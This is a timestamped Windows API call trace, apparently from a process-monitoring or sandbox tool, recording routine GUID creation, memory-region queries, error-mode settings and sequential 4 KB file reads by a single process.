[0079.971] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x206c7627, Data2=0x232a, Data3=0x4361, Data4=([0]=0xaa, [1]=0xd3, [2]=0x1c, [3]=0xed, [4]=0x4e, [5]=0x9b, [6]=0xb9, [7]=0xe2))) returned 0x0
[0079.971] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x546bcf21, Data2=0xf6e4, Data3=0x4c12, Data4=([0]=0xb2, [1]=0x46, [2]=0xcf, [3]=0x36, [4]=0x8, [5]=0x4a, [6]=0x1e, [7]=0xda))) returned 0x0
[0079.971] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x549783a6, Data2=0x2201, Data3=0x4127, Data4=([0]=0xbe, [1]=0xcc, [2]=0x14, [3]=0x28, [4]=0x5c, [5]=0xcd, [6]=0xf3, [7]=0x97))) returned 0x0
[0079.971] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf31378d5, Data2=0xbcdb, Data3=0x4db7, Data4=([0]=0xbb, [1]=0xe8, [2]=0xed, [3]=0x2c, [4]=0x46, [5]=0x97, [6]=0xce, [7]=0x78))) returned 0x0
[0079.981] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x1765cb55, Data2=0x1b46, Data3=0x4ee5, Data4=([0]=0x9d, [1]=0xb2, [2]=0x8b, [3]=0x0, [4]=0x8f, [5]=0x2e, [6]=0x6c, [7]=0x60))) returned 0x0
[0079.982] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.982] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.982] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.982] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.982] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.982] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.982] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.983] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.983] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.983] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.983] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.983] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.983] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.984] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.984] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.984] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.984] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.984] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.985] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.985] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.985] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xc5cec187, Data2=0xea55, Data3=0x4555, Data4=([0]=0x92, [1]=0xde, [2]=0x6d, [3]=0x51, [4]=0xc8, [5]=0x6a, [6]=0x7f, [7]=0xd8))) returned 0x0
[0079.985] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.985] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.985] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.985] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.985] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.986] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.986] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.986] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.986] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.986] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.986] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.987] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.987] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.987] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.987] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.987] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.988] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.988] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.988] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.988] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.988] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xa927da1d, Data2=0x6517, Data3=0x4310, Data4=([0]=0xad, [1]=0x64, [2]=0x29, [3]=0x86, [4]=0xe6, [5]=0x5a, [6]=0x83, [7]=0x21))) returned 0x0
[0079.988] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.988] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.989] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.989] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.989] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.989] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.989] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.989] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.990] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.990] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.990] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.990] VirtualQuery (in: lpAddress=0xcb480, lpBuffer=0xcc340, dwLength=0x30 | out: lpBuffer=0xcc340*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.990] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.990] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.990] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.991] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.991] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf50ae623, Data2=0x2c52, Data3=0x42b0, Data4=([0]=0x96, [1]=0xb3, [2]=0xfd, [3]=0x49, [4]=0x72, [5]=0xb7, [6]=0x7f, [7]=0xb))) returned 0x0
[0079.991] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xe83d0b5d, Data2=0x5dda, Data3=0x4b20, Data4=([0]=0x8a, [1]=0x6a, [2]=0x93, [3]=0xc1, [4]=0xd3, [5]=0x51, [6]=0x37, [7]=0x96))) returned 0x0
[0079.991] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x42e3f776, Data2=0x98b2, Data3=0x474f, Data4=([0]=0x8d, [1]=0xc3, [2]=0xd7, [3]=0xee, [4]=0x1f, [5]=0x50, [6]=0xd3, [7]=0x85))) returned 0x0
[0079.991] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x1ea0f20d, Data2=0xaf5d, Data3=0x4943, Data4=([0]=0xbd, [1]=0x29, [2]=0xb5, [3]=0xef, [4]=0x78, [5]=0x30, [6]=0xfb, [7]=0x96))) returned 0x0
[0079.991] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xa129d931, Data2=0x59fd, Data3=0x4d21, Data4=([0]=0x99, [1]=0xbe, [2]=0x3c, [3]=0xf2, [4]=0xc6, [5]=0x5c, [6]=0xf8, [7]=0x9c))) returned 0x0
[0079.992] VirtualQuery (in: lpAddress=0xcb590, lpBuffer=0xcc450, dwLength=0x30 | out: lpBuffer=0xcc450*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.992] VirtualQuery (in: lpAddress=0xcb620, lpBuffer=0xcc4e0, dwLength=0x30 | out: lpBuffer=0xcc4e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.992] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x2154d715, Data2=0x53fe, Data3=0x4a61, Data4=([0]=0x8d, [1]=0x68, [2]=0x1d, [3]=0x51, [4]=0x17, [5]=0xec, [6]=0x99, [7]=0xe7))) returned 0x0
[0079.992] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x594a425e, Data2=0xf515, Data3=0x4317, Data4=([0]=0x87, [1]=0x28, [2]=0xf8, [3]=0xb5, [4]=0xc7, [5]=0x5a, [6]=0x2a, [7]=0x23))) returned 0x0
[0079.992] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x442dd598, Data2=0x51e2, Data3=0x4cec, Data4=([0]=0xa8, [1]=0x5c, [2]=0x4, [3]=0xb5, [4]=0xd6, [5]=0x3f, [6]=0xae, [7]=0x6d))) returned 0x0
[0079.992] SetErrorMode (uMode=0x1) returned 0x1
[0079.992] SetErrorMode (uMode=0x1) returned 0x1
[0079.992] GetFileType (hFile=0x304) returned 0x1
[0079.993] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.993] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.993] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.993] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.993] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.994] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.994] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.994] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.994] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.995] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.995] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.995] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.995] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.995] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.996] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.996] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.996] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.997] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.997] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.997] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
